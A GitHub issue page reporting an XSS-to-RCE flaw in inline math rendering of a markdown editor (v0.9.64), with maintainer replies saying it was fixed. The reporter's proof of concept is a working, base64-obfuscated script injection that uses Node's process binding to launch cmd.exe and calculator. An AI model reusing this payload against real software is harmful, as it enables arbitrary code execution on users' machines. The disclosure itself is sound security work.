Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

The XSS with resultant RCE vulnerability when rendering Mathematical formula inline. #2131

Closed
Li4n0 opened this issue Jan 26, 2019 · 2 comments

Comments

@Li4n0
Copy link

commented Jan 26, 2019

The new version (v0.9.64), only fixed the vulnerability when rendering mathematical formula in block. However it also has this problem when rendering inline ,so the new poc:

$</script><iframe src=javascript:eval(atob('dmFyIFByb2Nlc3MgPSB3aW5kb3cucGFyZW50LnRvcC5wcm9jZXNzLmJpbmRpbmcoJ3Byb2Nlc3Nfd3JhcCcpLlByb2Nlc3M7CnZhciBwcm9jID0gbmV3IFByb2Nlc3MoKTsKcHJvYy5vbmV4aXQgPSBmdW5jdGlvbiAoYSwgYikge307CnZhciBlbnYgPSB3aW5kb3cucGFyZW50LnRvcC5wcm9jZXNzLmVudjsKdmFyIGVudl8gPSBbXTsKZm9yICh2YXIga2V5IGluIGVudikgZW52Xy5wdXNoKGtleSArICc9JyArIGVudltrZXldKTsKcHJvYy5zcGF3bih7CiAgICBmaWxlOiAnY21kLmV4ZScsCiAgICBhcmdzOiBbJy9rIGNhbGMnXSwKICAgIGN3ZDogbnVsbCwKICAgIHdpbmRvd3NWZXJiYXRpbUFyZ3VtZW50czogZmFsc2UsCiAgICBkZXRhY2hlZDogZmFsc2UsCiAgICBlbnZQYWlyczogZW52XywKICAgIHN0ZGlvOiBbewogICAgICAgIHR5cGU6ICdpZ25vcmUnCiAgICB9LCB7CiAgICAgICAgdHlwZTogJ2lnbm9yZScKICAgIH0sIHsKICAgICAgICB0eXBlOiAnaWdub3JlJwogICAgfV0KfSk7'))></iframe>$
@Li4n0 Li4n0 changed the title The XSS vulnerability when rendering Mathematical formula inline. The XSS with resultant RCE vulnerability when rendering Mathematical formula inline. Jan 26, 2019
@abnerlee abnerlee added the bug label Jan 26, 2019
@abnerlee

This comment has been minimized.

Copy link
Contributor

commented Feb 17, 2019

fixed in new release

@abnerlee abnerlee closed this Feb 17, 2019
@attritionorg

This comment has been minimized.

Copy link

commented Mar 20, 2019

@abnerlee Can you link to the fixing commit and/or a reference for the 'new release'? This project does not show any releases currently.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
3 participants
You can’t perform that action at this time.